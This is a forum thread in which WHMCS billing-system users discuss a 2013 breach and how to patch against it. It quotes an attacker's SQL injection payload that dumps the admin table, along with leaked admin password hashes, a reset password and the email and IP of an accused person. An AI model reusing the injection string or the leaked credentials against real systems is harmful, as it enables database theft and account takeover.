Hacking Incident

[WorldWideWebDev]

Thought i would share some information on a hacking attempt, (Successful to an extent,) which i had happen this morning. Just in case anyone gets a new customer with this email or name turn up on their system.

 

I hope that Kandyug@gmail.com isn't here? I'd like to get my hands on that one... I dont know if this is the best place to alert people of this guy, but here is a start from me..

have a read of this bit of interesting info... But if he is trolling here, we should do something about it..

This happened at 6:35 am this morning to me. I got an sms from my alert telling me an admin had logged in from a non whitelisted IP.. Read on. Anthony Molina.

 

Known information about a hacker who hacked in to my system today.

Going by the name of Nguyen Long

Logged IP Address of :- 113.166.57.219

City : Thua Thien Hue , Country Vietnam

Email --kandyug@gmail.com

HE USES THIS TO GET THE LOGIN EXPLOIT SO I AM PRETTY SURE HE USES IT A LOT...

 

Anyway before he left he also changed his original details..

 

First Name: 'Nguyen' to 'AES_ENCRYPT(1,1), firstname= (SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)'

Last Name: 'Long' to '1'

Company Name: '' to '1'

Address 1: '10 am mat' to '1'

Address 2: 'Hue' to '1'

City: 'Thua Thien Hue' to '1'

State: '??ng Nai' to '1'

Postcode: '47000' to '1'

Country: 'VN' to 'US'

Phone Number: '841627118435' to '1'

Default Payment Method: '' to ''

 

NEWSLETTER: 'on' to ''

SMS NOTIFICATIONS: 'on' to ''

MOBILE PHONE NUMBER: '841627118435' to ''

 

The number happens to be Yellow Pages Sensis Australia..

 

What can i do?? Spam him? Who do i actually report this to?

 

Cheers

[WorldWideWebDev]

Hey Moderators, could you please give me access to my settings so that i may adjust some things? Like messages, settings, avatars and the like?? Thanks...

[Infopro]

New users are limited as to what they can do. Once you become more active on the forums, more options and features are opened up to you.

[WorldWideWebDev]

And they call Victoria a nanny state ha...

[Infopro]

And with that post, you should be good to go. Try again.

 

Nothing to do with a nanny, it has everything to do with spammers though. My apologies for the inconvenience.

[WorldWideWebDev]

Cheers guys...

[webberoo]

Did you get anywhere with this? I have recently had a similar thing happen on my site.

 

Any advice?

 

Thanks

Toby

[bear]

Any advice?

 

Yes, make sure you've patched or updated. See this: http://blog.whmcs.com/

[WorldWideWebDev]

Gone into lockdown mode. Scarred shitless. Ive made sure all the updates and patches where applied to the site, changed all my passwords, (Far out thats hard, its not just WHMCS, its the hosts, domain suppliers, all the API's, add-on connections etc) I signed up for two factor authentication (time based option) Used Google Captcha ( at least it also captures IP address) disabled Tickets for non registered users, disabled all free offers so that users cannot register for a free product, hence having access to ticketing system. Drank a bottle of scotch , not sure whats next, maybe do the last thing again? Grrr, its all too hard.

[bear]

hence having access to ticketing system

That's the first mention I've seen of the tickets being an issue. As far as I know this has to do with submitting a details change request for a registered user with a specially crafted submission.

What made you mention tickets (aside from the bottle)?

[WorldWideWebDev]

Im not a programmer but ive had many tickets in the past submitted with code on them. I looked into it and found some startling information. Is it correct? i don't know. what i do know is that my system responded with all of my passwords to the person in a automated email. The ticket system was off for non registered users after the first attempts. But i forgot something, i had free offers available. Hence a person could become a registered user and then hack the system. This was actually good in a way, because we had info on the registration, and the hack afterwards. As i said, i'm not sure how they did it, i know what they did and after the patches i hope its secure.

 

This is info i found previously, months ago.. /http://www.devilscafe.in/2012/05/whmcs-hacking-with-sumbit-ticket.html

 

As mentioned i don't know what they did to get this, but here was my server reply to them.

Dear 1:admin:info@worldwidetech.com.au:2767b7e235i488r74cd744df1877cd26fd, 2:mrxtheman:info@worldwidetech.com.au:99b5e27c7093aadd1234rffp71hyt40285, 3:Sandi:sandra@worldwidetechn.com.au:210dc1fd8cb433ede44rr15yb28fac275, 4:George:webmaster@worldwide.com.au:ffc53ce0106e98b43ewrff4sdf5cf8ed065, 5:WHMCS:support@whmcs.com:e72c07a946955ea521rwewrett545513579387 1 (1),

 

As you requested, your password for our client area has now been reset. Your new login details are as follows:

 

/http://www.worldwidewebs.com.au/billing

Email: kandyug @ gmail.com

Password: exaiZlI0s0

 

To change your password to something more memorable, after logging in go to My Details > Change Password.

 

World Wide Web Developers

 

@ World Wide Web Developers

 

 

So from this i assume he had the golden key to everything and got in. I would not have even known, it had not been for an addon which i now praise...

 

Anthony

[bear]

Im not a programmer but ive had many tickets in the past submitted with code on them.

The link you provided was from May 2012, and that "php(eval)" ticket exploit was fixed long ago.

As mentioned i don't know what they did to get this, but here was my server reply to them.

xxxx

As you requested, your password for our client area has now been reset. Your new login details are as follows:

From that it looks like the more recent issue is the cause (but a slightly different attack vector than I'd been reading about), since that's been used to grab details from the database of affected users. The patch, and patched recent versions have reportedly corrected this. There are also mod security rules that are effective in helping reduce the risk.

So from this i assume he had the golden key to everything and got in. I would not have even known, it had not been for an addon which i now praise...

Looks from that like they did indeed gain access, at least to the point of grabbing that info.

What addon was it that's helped you spot that?

[WorldWideWebDev]

WHMCS-NOWs SMS add-on alerted me to an ADMIN loggin from a non whitelisted IP. I was onto it shortly after thinking "How could that be?" We logged in before he obviously managed to do worse. SMS add in clearly saved us in this situation. (Plug, but it really did.)

 

I want to disable tickets because i got these tickets in the past with the code mentioned above. Not that they got in at that stage, and it was long ago. This time i assume the only way he got a reply from my system is because he created a ticket , isn't it? Or is the system so flawed that now they don't even have to create a ticket to get a response? Dont even mention that they get a response when they join? cause if they can somehow put malicious code into the process of becoming a customer we are F*&^&$%$D........This system is getting worse by the minute? How can anyone run reliable ?

Edited October 12, 2013 by WorldWideWebDev

[bear]

The most recent security issue allowed someone to submit information that would interact with the database in unexpected ways, allowing them to do various things they shouldn't have access to. The first one I heard of was a user details change, not tickets. Your example above appears to be the password reset function, but with the same exploit (assuming here), provided your system was not patched or up to date when that happened.

If you were not on the latest patched version(s) when this took place, that's probably why it succeeded. WHMCS has stated the latest versions of the two supported branches are patched against this.

[PhatPT]

You can contact VNCERT - http://vncert.gov.vn/

[Walter Blanco]

Can you confirm if you had applied the latest patch?

 

I mean, the patch from this security problem http://forum.whmcs.com/showthread.php?79527-October-3rd-2013-Security-Patch-Follow-Up&p=339519#post339519

[WorldWideWebDev]

Thanks for the link PhatPT, but i was lost when i opened it.

 

- - - Updated - - -

 

Can anyone tell me where i can disable registrations unless they purchase a product from me?

[brian!]

setup -> general settings -> other -> untick "Allow Client Registration"

[WorldWideWebDev]

Thanks.....

[Walter Blanco]

Thanks.....

 

did you read my message #16? it went into moderation and appeared 24h after i wrote it, that link has information about your problem

[WorldWideWebDev]

Walter. It was exactly as mentioned in the post you mentioned #16. I didn't have the patch installed. So it got me. From research i have made, he gets the Hash codes delivered by email and then easily visits one of many online hash decoders (example http://www.md5decrypter.co.uk ) put in the whole bundle and it spits out passwords. 2 of my passwords came out on that site. Give it a go, my password hashes still work. It seems too easy.

[epretorious]

From research i have made, he gets the Hash codes delivered by email...

 

Will the e-mail appear in the Client Profile list of e-mails (https://www.example.com/whmcs/admin/clientsemails.php?userid=XX)? Or would that just be too easy?

[WorldWideWebDev]

Hi Epretorious, To answer the question, no it isn't that easy , it does not show up an his list of emails. Its easier, it shows all this information on his first name section of the active client. So in the drop down field you see all of the whole string of information. Then its in the logs also. It was explained completely here .. http://blog.sucuri.net/2013/10/whmcs-sql-injection-vulnerability-in-the-wild.html

[Walter Blanco]

whmcs uses md5 for password hashes?

 

 

(no, i still don't have a whmcs license, i'm checking these forums to view pros and cons before buying)

[epretorious]

This would be laughable if it hadn't happened two days after patching WHMCS to 5.2.8: I received this e-mail this morning...

 

Rocket-Powered.com

 

hello admin i just could get data from your database using a WHMCS SQL inejection via python script ,

DATA from admin table: admin:administrative@rocket-powered.com:79df6ade1bccf3e3fbdd123a9e11c29d

 

Please contact me )

The tuple contains the MD5 hash of the new password that I'd set twentyfour hours after I'd patched WHMCS!

 

WTF?

Edited October 15, 2013 by epretorious